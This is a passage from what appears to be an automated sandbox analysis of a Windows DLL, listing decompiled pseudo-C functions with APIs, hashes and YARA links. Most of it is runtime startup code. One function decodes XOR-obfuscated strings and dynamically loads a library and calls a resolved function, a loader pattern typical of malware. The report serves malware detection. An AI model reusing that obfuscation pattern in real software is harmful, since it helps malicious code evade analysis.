							if(_t45 == 0) {
								_push(_t35);
								_t29 = E732119D0( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E7321297B(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E73212B36( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E73212821(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E73212B36( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x73231870 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x73212a2b
0x73212a2b
0x73212a2d
0x73212a32
0x73212a37
0x73212a3c
0x73212a4d
0x73212a4d
0x73212a51
0x73212a54
0x73212a60
0x73212a60
0x73212a6d
0x73212a6f
0x73212a72
0x73212a74
0x73212b1d
0x73212b1d
0x73212b24
0x73212b26
0x73212b29
0x73212b35
0x73212b35
0x73212a7f
0x73212a84
0x73212a86
0x73212a89
0x73212a8b
0x00000000
0x00000000
0x73212a91
0x73212a91
0x73212a9b
0x73212a9d
0x73212aa0
0x73212aa3
0x73212aa5
0x73212aa7
0x73212aa9
0x73212aae
0x73212ab3
0x73212ab5
0x73212ab5
0x73212abb
0x73212abc
0x73212ac1
0x73212ac7
0x73212ac7
0x73212aa7
0x73212acc
0x73212ace
0x73212ad5
0x73212adf
0x73212ae1
0x73212ae4
0x73212ae6
0x73212af2
0x73212b1a
0x73212b1a
0x00000000
0x73212ad0
0x73212ad0
0x73212ad3
0x00000000
0x00000000
0x00000000
0x73212ad3
0x73212ace
0x73212a56
0x73212a59
0x00000000
0x00000000
0x73212a5b
0x00000000
0x73212a5b
0x73212a3e
0x73212a44
0x00000000
0x00000000
0x73212a46
0x00000000

APIs

dllmain_raw.LIBCMT ref: 73212A68
dllmain_crt_dispatch.LIBCMT ref: 73212A7F
dllmain_raw.LIBCMT ref: 73212AC7
dllmain_crt_dispatch.LIBCMT ref: 73212ADA
dllmain_raw.LIBCMT ref: 73212AED

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 4e56da261fa4cac84b54e0b9dc4029fa0c8c76047cbeef67b53c36cba0a88b24
Instruction ID: 30d4e82c4446436a142c8a7eea6ae30259434bfc0cb3e07506c7dbde3a90d709
Opcode Fuzzy Hash: 4e56da261fa4cac84b54e0b9dc4029fa0c8c76047cbeef67b53c36cba0a88b24
Instruction Fuzzy Hash: 74213072E0032FEFDB225E55DA40F6F3AF9EB84A90B054125FC1656250D7719EE18BE0

Uniqueness

Uniqueness Score: -1.00%

Function 73212874, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E73212874(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E732131E0(__ebx, __edi, __esi);
				_t43 = E73212EBE(__ecx, __edx, 0); // executed
				_t90 = 0x7322fa70;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E73212DC3();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x73231bb0;
					if( *0x73231bb0 != 0) {
						E7321305D(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x7322fa90);
						E732131E0(1, __edi, __esi);
						_t48 =  *0x73231870; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x73231870 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E73212DC3();
							 *(_t123 - 4) = 1;
							__eflags =  *0x73231bb0 - 2;
							if( *0x73231bb0 != 2) {
								E7321305D(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x7322fab8);
								E732131E0(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E73212B36( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E73212821(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E732119D0( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E732119D0( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E73212B36( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E73212821(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E73212B36( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x73231870 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E73212E8E(1, _t90, 1, _t113);
								E73212D4A();
								E732131AC();
								 *0x73231bb0 =  *0x73231bb0 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E73212A10();
								_t67 = E7321302F( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E73212A1D();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x73231bb0 = 1;
						if(E73212E20(_t132) != 0) {
							E73212D3E(E73213180());
							E73212D62();
							_t80 = E73214407(0x7321d110, 0x7321d120);
							_pop(_t102);
							if(_t80 == 0 && E73212DF5(1, _t102) != 0) {
								E732143C0(_t102, 0x7321d108, 0x7321d10c);
								 *0x73231bb0 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E73212957();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E73213057();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E73212F7E(_t85, _t106, _t121, _t138) != 0) {
									 *0x7321d104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x73231870 =  *0x73231870 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x73212874
0x73212874
0x73212874
0x73212874
0x7321287b
0x73212882
0x73212887
0x7321288a
0x73212961
0x73212961
0x73212961
0x00000000
0x73212890
0x73212895
0x73212898
0x7321289a
0x7321289d
0x732128a1
0x732128a8
0x73212975
0x7321297a
0x7321297b
0x7321297d
0x73212982
0x73212987
0x7321298c
0x7321298e
0x73212995
0x7321299d
0x732129a0
0x732129a9
0x732129ac
0x732129af
0x732129b6
0x73212a25
0x73212a2a
0x73212a2b
0x73212a2d
0x73212a32
0x73212a37
0x73212a3a
0x73212a3c
0x73212a4d
0x73212a4d
0x73212a51
0x73212a54
0x73212a60
0x73212a60
0x73212a6d
0x73212a6f
0x73212a72
0x73212a74
0x73212a7f
0x73212a84
0x73212a86
0x73212a89
0x73212a8b
0x00000000
0x00000000
0x73212a8b
0x73212a56
0x73212a56
0x73212a59
0x00000000
0x73212a5b
0x73212a5b
0x73212a91
0x73212a91
0x73212a9b
0x73212a9d
0x73212aa0
0x73212aa3
0x73212aa5
0x73212aa7
0x73212aa9
0x73212aae
0x73212ab3
0x73212ab5
0x73212ab5
0x73212abb
0x73212abc
0x73212ac1
0x73212ac7
0x73212ac7
0x73212aa7
0x73212acc
0x73212ace
0x73212ad5
0x73212adf
0x73212ae1
0x73212ae4
0x73212ae6
0x73212af2
0x73212b1a
0x73212b1a
0x73212ad0
0x73212ad0
0x73212ad3
0x00000000
0x00000000
0x73212ad3
0x73212ace
0x73212a59
0x73212b1d
0x73212b24
0x73212a3e
0x73212a3e
0x73212a44
0x00000000
0x73212a46
0x73212a46
0x73212a46
0x73212a44
0x73212b29
0x73212b35
0x732129b8
0x732129b8
0x732129bd
0x732129c2
0x732129c7
0x732129ce
0x732129d2
0x732129dc
0x732129e8
0x732129ea
0x732129ea
0x732129ec
0x732129ef
0x732129f6
0x732129fb
0x00000000
0x732129fb
0x73212990
0x73212990
0x732129fd
0x73212a00
0x73212a0c
0x73212a0c
0x732128ae
0x732128ae
0x732128bf
0x732128c6
0x732128cb
0x732128da
0x732128e0
0x732128e3
0x732128f8
0x732128ff
0x73212909
0x7321290b
0x7321290b
0x732128e3
0x7321290e
0x73212915
0x7321291c
0x00000000
0x7321291e
0x73212923
0x73212925
0x73212928
0x7321292a
0x73212933
0x73212941
0x73212947
0x73212947
0x73212933
0x73212949
0x73212951
0x73212951
0x73212963
0x73212966
0x73212972
0x73212972
0x732128a8

APIs

__RTC_Initialize.LIBCMT ref: 732128C1

Part of subcall function 73212D3E: InitializeSListHead.KERNEL32(73231B98,732128CB,7322FA70,00000010,7321285C,?,?,?,73212A84,?,00000001,?,?,00000001,?,7322FAB8), ref: 73212D43

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 7321292B

Strings

D2!s, xrefs: 73212941

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID: D2!s
API String ID: 3231365870-1464734957
Opcode ID: e8bad83b66a7de20299cd9144ce9c48784f50c44588dd2af7ed969aac16b1b60
Instruction ID: b283fd156556775d6596b585bd2c2fcf3f662eb574342d9d0b69f8834dad5e50
Opcode Fuzzy Hash: e8bad83b66a7de20299cd9144ce9c48784f50c44588dd2af7ed969aac16b1b60
Instruction Fuzzy Hash: 6121D13360834FDBEB00ABB8870479C37F29F05665F244519E8862B1C2DBB250F19A99

Uniqueness

Uniqueness Score: -1.00%

Function 73216FE9, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73216FE9(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E73216FB2(_t26) - _t26 >> 1;
					_t7 = E73216F05(0, 0, _t26, E73216FB2(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E73217F4F(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E73216F05(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E73215C03(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x73216ff8
0x73216ffe
0x73217059
0x73217059
0x73217000
0x7321700e
0x73217014
0x7321701c
0x73217021
0x00000000
0x73217023
0x73217024
0x73217029
0x7321702e
0x7321704e
0x73217048
0x73217048
0x7321704a
0x7321704a
0x73217051
0x73217056
0x73217021
0x7321705d
0x73217060
0x73217060
0x7321706e

APIs

GetEnvironmentStringsW.KERNEL32 ref: 73216FF2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 73217060

Part of subcall function 73216F05: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,73218EE7,?,00000000,00000000), ref: 73216FA7

Part of subcall function 73217F4F: HeapAlloc.KERNEL32(00000000,73217C8E,73217C8E,?,732169BA,00000220,?,73217C8E,?,?,?,?,73219DA2,00000001,?,?), ref: 73217F81

_free.LIBCMT ref: 73217051

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocByteCharFreeHeapMultiWide_free
String ID:
API String ID: 424071858-0
Opcode ID: f1cde1c11396c6fcf89488265d903fae96bffe06ae82b98bed584d14eff77d7d
Instruction ID: c1da175653be3bd6cc4f173f13efd609f44b7899a631a06e7abcbc63c0229bb1
Opcode Fuzzy Hash: f1cde1c11396c6fcf89488265d903fae96bffe06ae82b98bed584d14eff77d7d
Instruction Fuzzy Hash: 3E01D8B39057177B632125BE0F88F7F69EDCEC6A907150129FD0AC3140ED95CDA181B0

Uniqueness

Uniqueness Score: -1.00%

Function 73217194, Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E73217194() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x73231f50 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x73232254; // 0x165db20
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x73217199
0x7321719b
0x7321719f
0x732171a8
0x732171b3
0x732171c3
0x732171c7
0x732171ca
0x732171dc
0x732171cc
0x732171cf
0x732171d8
0x732171d1
0x732171d4
0x732171d4
0x732171cf
0x732171de
0x732171e6
0x732171eb
0x732171fa
0x732171f1
0x732171f2
0x732171f2
0x732171fe
0x7321721c
0x73217220
0x73217227
0x7321722e
0x73217230
0x73217233
0x73217233
0x73217200
0x73217200
0x73217203
0x73217209
0x73217214
0x73217216
0x73217216
0x7321720b
0x7321720b
0x7321720b
0x73217209
0x732171bb
0x732171bb
0x732171bb
0x7321723a
0x7321723b
0x73217247

APIs

GetStdHandle.KERNEL32(000000F6), ref: 732171E0
GetFileType.KERNELBASE(00000000), ref: 732171F2

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 7d5187bf012053d37a73f53a31387cad8336f4e8cd07044de2ce77f000d5d1c3
Instruction ID: c4d637292c90c5b65793b088495c74a16443ba03e339de017629f52f6448ed0a
Opcode Fuzzy Hash: 7d5187bf012053d37a73f53a31387cad8336f4e8cd07044de2ce77f000d5d1c3
Instruction Fuzzy Hash: 6811E4326047434AC7316D3E8E88712BAF9A7CA634B380719E4BB835E1D634DDEB9640

Uniqueness

Uniqueness Score: -1.00%

Function 73214B5C, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73214B5C(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x73214b61

APIs

Part of subcall function 73216FE9: GetEnvironmentStringsW.KERNEL32 ref: 73216FF2
Part of subcall function 73216FE9: _free.LIBCMT ref: 73217051
Part of subcall function 73216FE9: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 73217060

_free.LIBCMT ref: 73214B9C
_free.LIBCMT ref: 73214BA3

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 80e85a3621a315aa3a12ed825409fef6d62d66b2d9dc5fd70cf7448994ebf543
Instruction ID: 82f6d33fa92c5bbf389b320e48057d358168a847b6fe2dc4b639f501ff71e10d
Opcode Fuzzy Hash: 80e85a3621a315aa3a12ed825409fef6d62d66b2d9dc5fd70cf7448994ebf543
Instruction Fuzzy Hash: 29E02B67E04A3307F3526E3F7F00B5F16E58F82230B72031BD828D70C0EAA086E20195

Uniqueness

Uniqueness Score: -1.00%

Function 732120E0, Relevance: 1.6, APIs: 1, Instructions: 105
libraryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E732120E0() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				char _v116;
				intOrPtr* _t76;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr* _t103;
				void* _t104;

				_v24 = 0;
				_v20 = 0x24e33097;
				_v16 = 0x32e03697;
				_v12 = 0x1fb2dba;
				_v8 = 0x40825fdb;
				if(_v24 == 0) {
					_t101 = 0;
					do {
						 *(_t104 + _t101 * 4 - 0x10) =  *(_t104 + _t101 * 4 - 0x10) ^ 0x40825fdb;
						_t101 = _t101 + 1;
					} while (_t101 < 4);
				}
				_v116 = 0;
				_v112 = 0x14032ec6;
				_v108 = 0x14082edf;
				_v104 = 0x140a2ec8;
				_v100 = 0x14542e9e;
				_v96 = 0x14022e83;
				_v92 = 0x140a2ec1;
				_v88 = 0x14662ead;
				if(_v116 == 0) {
					_t100 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t104 + _t100 * 4 - 0x6c) =  *(_t104 + _t100 * 4 - 0x6c) ^ 0x14662ead;
						_t100 = _t100 + 1;
					} while (_t100 < 7);
				}
				_t76 = E73211FB0( &_v112,  &_v20);
				_v44 = 0;
				_t103 = _t76;
				_v40 = 0x61316796;
				_v36 = 0x1d506e98;
				_v32 = 0x430f46f3;
				_v28 = 0x2f6322dd;
				if(_v44 == 0) {
					_t99 = 0;
					do {
						 *(_t104 + _t99 * 4 - 0x24) =  *(_t104 + _t99 * 4 - 0x24) ^ 0x2f6322dd;
						_t99 = _t99 + 1;
					} while (_t99 < 4);
				}
				 *_t103( &_v40);
				_v64 = 0;
				_v60 = 0x74f3bf6a;
				_v56 = 0x27b6b25b;
				_v52 = 0x79e9bf05;
				_v48 = 0x1585db2b;
				if(_v64 == 0) {
					_t98 = 0;
					do {
						 *(_t104 + _t98 * 4 - 0x38) =  *(_t104 + _t98 * 4 - 0x38) ^ 0x1585db2b;
						_t98 = _t98 + 1;
					} while (_t98 < 4);
				}
				LoadLibraryA( &_v60); // executed
				_v84 = 0;
				_v80 = 0x4781804c;
				_v76 = 0x34c48d7d;
				_v72 = 0x6a9b8023;
				_v68 = 0x6f7e40d;
				if(_v84 == 0) {
					_t97 = 0;
					do {
						 *(_t104 + _t97 * 4 - 0x4c) =  *(_t104 + _t97 * 4 - 0x4c) ^ 0x06f7e40d;
						_t97 = _t97 + 1;
					} while (_t97 < 4);
				}
				return  *_t103( &_v80);
			}

0x732120e6
0x732120ea
0x732120f1
0x732120f8
0x732120ff
0x7321210e
0x73212110
0x73212112
0x7321211b
0x7321211f
0x73212120
0x73212112
0x73212125
0x73212129
0x73212130
0x73212137
0x7321213e
0x73212145
0x7321214c
0x73212153
0x73212161
0x73212163
0x73212165
0x73212170
0x73212179
0x7321217d
0x7321217e
0x73212170
0x73212189
0x7321218e
0x73212192
0x73212194
0x7321219b
0x732121a2
0x732121a9
0x732121b7
0x732121b9
0x732121c0
0x732121c9
0x732121cd
0x732121ce
0x732121c0
0x732121d7
0x732121d9
0x732121dd
0x732121e4
0x732121eb
0x732121f2
0x73212200
0x73212202
0x73212210
0x73212219
0x7321221d
0x7321221e
0x73212210
0x73212227
0x73212229
0x7321222d
0x73212234
0x7321223b
0x73212242
0x73212250
0x73212252
0x73212260
0x73212269
0x7321226d
0x7321226e
0x73212260
0x7321227d

APIs

LoadLibraryA.KERNELBASE(74F3BF6A), ref: 73212227

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d394c865aa8458134e41eac7a06678bc180bcae41070823c07d88546fafdf71b
Instruction ID: 48141705623ce72dd07bc3b2cb2e63fd7ea11dde5516e2d618263c439ebfd1b9
Opcode Fuzzy Hash: d394c865aa8458134e41eac7a06678bc180bcae41070823c07d88546fafdf71b
Instruction Fuzzy Hash: 6E4152B0C1029DCADB05DFE0E2847EDBFB9AF09304F66446DE4126B241E3718984CF91

Uniqueness

Uniqueness Score: -1.00%

Function 73217F4F, Relevance: 1.3, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73217F4F(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E73215B93(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = HeapAlloc( *0x73232230, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E732185CC();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E732177BF(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x73217f55
0x73217f5b
0x73217f8d
0x73217f92
0x73217f98
0x00000000
0x73217f98
0x73217f5f
0x73217f61
0x73217f61
0x73217f78
0x73217f81
0x73217f89
0x00000000
0x00000000
0x73217f69
0x73217f6b
0x00000000
0x00000000
0x73217f74
0x73217f76
0x00000000
0x00000000
0x73217f76
0x00000000

APIs

HeapAlloc.KERNEL32(00000000,73217C8E,73217C8E,?,732169BA,00000220,?,73217C8E,?,?,?,?,73219DA2,00000001,?,?), ref: 73217F81

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c9e1e6c586c61d998da886ad8ba11c14cc6d07780be7383f7913ef1763bceb23
Instruction ID: 1cccab455c018cf9ba21a3cb8acbee39d11eae52736ae6b81cc69d3c822e496e
Opcode Fuzzy Hash: c9e1e6c586c61d998da886ad8ba11c14cc6d07780be7383f7913ef1763bceb23
Instruction Fuzzy Hash: 44E0ED2214432767EB123A2E9F04B4B3AD89FC16A0F290130EC2A921C4CBA0CDE181E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 73211000, Relevance: 6.6, Strings: 5, Instructions: 383
COMMONCrypto

Download Yara Rule

C-Code - Quality: 32%

			E73211000(intOrPtr* __ecx) {
				signed int _v8;
				char _v12;
				char _v28;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				char* _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				char _v240;
				char _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
